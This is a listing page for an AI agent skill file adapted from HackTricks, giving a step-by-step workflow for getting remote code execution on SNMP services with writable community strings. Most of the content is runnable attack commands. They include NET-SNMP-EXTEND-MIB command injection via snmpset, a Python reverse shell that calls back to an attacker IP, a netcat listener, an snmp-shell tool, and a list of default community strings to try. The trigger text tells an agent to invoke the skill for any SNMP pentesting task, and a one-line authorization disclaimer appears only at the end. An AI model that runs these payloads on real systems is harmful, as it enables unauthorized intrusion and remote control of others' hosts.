OpenSkillIndex← back to search

Hacktricks-skills snmp-rce-exploitation

Exploit SNMP services with write-accessible community strings to achieve remote code execution. Use this skill whenever you need to test SNMP security, enumerate SNMP services, inject commands via NET-SNMP-EXTEND-MIB, or gain shell access through SNMP misconfigurations. Trigger this for any SNMP pentesting task, especially when you have or suspect write-accessible community strings.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-snmp/snmp-rce/SKILL.MD
source content

SNMP Remote Code Execution Exploitation

This skill enables exploitation of SNMP services configured with write-accessible community strings to achieve remote code execution on target systems.

When to Use This Skill

Use this skill when:

  • You have identified an SNMP service and need to test for RCE vulnerabilities
  • You have or suspect write-accessible community strings (rwcommunity)
  • You need to enumerate SNMP services and their configurations
  • You want to inject commands via NET-SNMP-EXTEND-MIB
  • You need to establish reverse shells through SNMP exploitation

Prerequisites

Before attempting SNMP RCE exploitation:

  1. Install required tools:

    sudo apt install snmp snmp-mibs-downloader rlwrap -y

  2. Verify SNMP connectivity to the target:

    snmpwalk -v2c -c <community_string> <target_ip> system

  3. Confirm write access by attempting to set a value:

    snmpset -v2c -c <community_string> <target_ip> system.sysName.0 s "test"

Exploitation Workflow

Step 1: Enumerate SNMP Service

First, enumerate the SNMP service to understand what's available:

snmpwalk -v2c -c <community_string> <target_ip> NET-SNMP-EXTEND-MIB::nsExtendObjects

This will show existing extended commands and their configurations.

Step 2: Inject a Test Command

Inject a simple test command to verify RCE capability:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c <community_string> <target_ip> \
  'nsExtendStatus."testcommand"' = createAndGo \
  'nsExtendCommand."testcommand"' = /bin/echo \
  'nsExtendArgs."testcommand"' = 'hello world'

Step 3: Trigger Command Execution

Execute the injected command by reading the MIB object:

snmpwalk -v2c -c <community_string> <target_ip> NET-SNMP-EXTEND-MIB::nsExtendObjects

Important: Commands execute on read (run-on-read behavior). The output will show the command execution result.

Step 4: Establish Reverse Shell

For interactive shell access, inject a reverse shell command:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c <community_string> <target_ip> \
  'nsExtendStatus."shell"' = createAndGo \
  'nsExtendCommand."shell"' = /usr/bin/python3 \
  'nsExtendArgs."shell"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"<ATTACKER_IP>\",<PORT>));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'

Then trigger it:

snmpwalk -v2c -c <community_string> <target_ip> NET-SNMP-EXTEND-MIB::nsExtendObjects

Before triggering: Set up a listener on your attacker machine:

nc -lvnp <PORT>

Alternative: Using snmp-shell Tool

For a more robust shell experience, use the mxrch/snmp-shell tool:

git clone https://github.com/mxrch/snmp-shell.git
cd snmp-shell
sudo python3 -m pip install -r requirements.txt

Then run:

python3 snmp-shell.py -c <community_string> -t <target_ip>

Common Community Strings to Test

Try these default/weak community strings:

  • public
    (read-only default)
  • private
    (read-write default)
  • c0nfig
  • SuP3RPrivCom90
  • admin
  • manager
  • default
  • test
  • community

Key Concepts

NET-SNMP-EXTEND-MIB

The 

NET-SNMP-EXTEND-MIB
allows administrators to extend SNMP services with custom commands. The 
nsExtendObjects
table contains:

  • nsExtendStatus
    : Status of the extended command (createAndGo to activate)
  • nsExtendCommand
    : Absolute path to the executable
  • nsExtendArgs
    : Arguments to pass to the command

Run-on-Read Behavior

Commands injected via 

nsExtendObjects
execute when the MIB object is read (via 
snmpwalk
or similar). This is the core exploitation mechanism.

Requirements for Success

  1. Write-accessible community string - The community string must have write permissions
  2. Executable binary path - The command path must be absolute and executable
  3. SNMP service running - Target must have SNMP daemon active
  4. No restrictions - No firewall or access control blocking the exploitation

Troubleshooting

Command Not Executing

  • Verify the community string has write access
  • Check the absolute path to the binary exists on target
  • Ensure the binary is executable
  • Confirm SNMP service is running on target

No Response from Target

  • Verify network connectivity
  • Check if SNMP port (161/UDP) is open
  • Confirm the community string is correct
  • Check for firewall rules blocking SNMP

Shell Disconnects Immediately

  • Use 
    rlwrap
    for better terminal handling
  • Try different shell types (bash, sh, python)
  • Consider using the snmp-shell tool for persistence

Safety and Ethics

Only use this skill on systems you have explicit authorization to test. Unauthorized exploitation of SNMP services is illegal and unethical.

References